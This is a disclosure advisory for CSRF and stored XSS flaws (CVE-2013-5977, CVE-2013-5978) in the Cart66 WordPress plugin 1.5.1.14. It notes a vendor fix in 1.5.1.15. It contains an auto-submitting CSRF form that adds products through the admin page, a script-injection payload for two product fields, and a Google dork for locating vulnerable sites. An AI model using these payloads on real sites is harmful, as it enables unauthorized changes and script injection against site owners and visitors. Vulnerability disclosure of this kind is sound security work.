SecurityvulnsSECURITYVULNS:DOC:29955Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
Exploit Author: absane
Blog: http://blog.noobroot.com
Discovery date: September 29th 2013
Vendor notified: September 29th 2013
Vendor fixed: October 12 2013
Vendor Homepage: http://cart66.com
Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
Tested on: Wordpress 3.6.1
Google-dork: inurl:/wp-content/plugins/cart66
CVE (CSRF): CVE-2013-5977
CVE (XSS): CVE-2013-5978
Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.
Vulnerabilities:
1) CSRF
2) Code Injection
VULNERABILITY #1
*** CSRF***
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products
================
Proof of Concept
<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' value='absane was here' />
<input type='hidden' name='product[item_number]' id='product-item_number' value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" name='product[price_description]' value='LuLz' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' />
<input type="hidden" id="product-max_price" name='product[max_price]' value='' />
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value="" />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' />
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' />
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>
VULNERABILITY #2
*** Code Injection ***
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields:
- Product name
- Price description
================
Proof of Concept
In the vulnerable fields add <script>alert(0)</script> or any other code. The code is placed directly into the database.
Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product.
]…[
]…SOLUTIONS…[
]…[
Update to version 1.5.1.15 or greater.
Related
